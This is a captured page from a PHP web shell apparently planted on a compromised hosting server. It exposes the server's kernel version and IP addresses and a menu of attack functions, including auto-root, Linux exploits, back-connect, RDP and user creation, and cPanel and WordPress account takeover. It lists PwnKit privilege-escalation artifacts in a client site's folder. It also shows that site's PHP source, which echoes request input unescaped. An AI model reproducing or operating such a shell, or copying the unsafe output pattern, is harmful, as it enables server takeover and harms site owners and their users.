Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.144.117.164
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
CMS-NEW /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
validations
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.5
KB
-rw-r--r--
add-keyword.php
5.24
KB
-rw-r--r--
assign-service.php
6.59
KB
-rw-r--r--
blank-page.php
486
B
-rw-r--r--
category-excel.php
2.02
KB
-rw-r--r--
category.php
5.59
KB
-rw-r--r--
change-password.php
1.87
KB
-rw-r--r--
dashboard.php
22.39
KB
-rw-r--r--
edit-profile.php
4.68
KB
-rw-r--r--
error_log
5.84
KB
-rw-r--r--
forgot-password.php
2.08
KB
-rw-r--r--
keywords.php
6.24
KB
-rw-r--r--
login.php
4.83
KB
-rw-r--r--
logout.php
194
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register.php
5.98
KB
-rw-r--r--
user-excel.php
2.11
KB
-rw-r--r--
user.php
3.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : add-keyword.php
<?php $page='keyd'; include("include/header.php"); category_list('service_category'); if($_REQUEST['id']=='') { $na = 'Add Keyword'; $casn = base64_encode('14'); } else { $na = 'Upadte Keyword'; $casn = base64_encode('15'); category_edit('keyword_ranking',$_REQUEST['id']); } ?> <div class="page-wrapper"> <?php include("include/top-nav.php"); ?> <div class="page-content"> <div class="d-flex justify-content-between align-items-center flex-wrap grid-margin"> <div> <h4 class="mb-3 mb-md-0">Add Keyword</h4> </div> </div> <div class="row"> <div class="col-md-12 grid-margin stretch-card"> <div class="card"> <div class="card-body"> <h6 class="card-title"><?php echo $na; ?></h6> <form id="myform2" name="myform2"> <div class="row"> <div class="col-sm-3"> <div class="form-group"> <label>Please Select User</label> <select class="form-control validate[required]" name="user_id" id="u_id"> <option value="">Select User</option> <?php $ur = mysqli_query($conn,"select * from user_details where status='1' order by name asc"); while($ur1 = mysqli_fetch_array($ur)) { echo '<option value="'.$ur1['id'].'" '.($catr['user_id']==$ur1['id']?"selected":"").'>'.$ur1['name'].'</option>'; } ?> </select> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label>Please Select Services</label> <select class="form-control validate[required]" name="service_id" id="service_id"> <option value="">Please Select Services</option> </select> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label>Please Select Months Position</label> <input class="form-control validate[required] <?php if($_REQUEST['id'] =='') { echo 'dashboardDatee'; } else { echo ''; } ?>" type="text" placeholder="Please Select Months" name="months_value" value="<?php echo $catr['months_value']; ?>" <?php if($_REQUEST['id'] !='') { echo 'readonly'; } ?>> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label>Keyords</label> <input class="form-control validate[required] " type="text" name="keywods" placeholder="Keyords" value="<?php echo $catr['keywods']; ?>"> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label>First Week</label> <input class="form-control validate[required,custom[number]] " type="text" name="1_week" placeholder="First Week" value="<?php echo $catr['1_week']; ?>"> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label>Second Week</label> <input class="form-control validate[required,custom[number]] " type="text" name="2_week" placeholder="Second Week" value="<?php echo $catr['2_week']; ?>"> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label>Third Week</label> <input class="form-control validate[required,custom[number]] " type="text" name="3_week" placeholder="Third Week" value="<?php echo $catr['3_week']; ?>"> </div> </div> <div class="col-sm-3"> <div class="form-group"> <label>Fourth Week</label> <input class="form-control validate[required,custom[number]] " type="text" name="4_week" placeholder="Fourth Week" value="<?php echo $catr['4_week']; ?>"> </div> </div> <div class="col-sm-6"> <div class="form-group"> <input type="hidden" name="caseno" value="<?php echo $casn; ?>"> <input type="hidden" name="upid" value="<?php echo $_REQUEST['id']; ?>"> <button type="submit" class="btn btn-primary submit"><?php echo $na; ?></button> </div> </div> <div id="msg" class="col-md-12"></div> </div> </form> </div> </div> </div> </div> </div> <input type="hidden" value="<?php echo $catr['service_id']; ?>" id="e_sr"> <?php include("include/footer.php"); ?> <script type="text/javascript"> $(document).ready(function(){ $("#u_id").on('change',function(){ var id = $(this).val(); var e_sr = $("#e_sr").val(); $.post('php/',{'caseno': btoa("13"),'id':id,'table':'assign_list','e_sr':e_sr},function(data){ $("#service_id").html(data); }); }); $("#u_id").trigger('change'); }); </script>
Close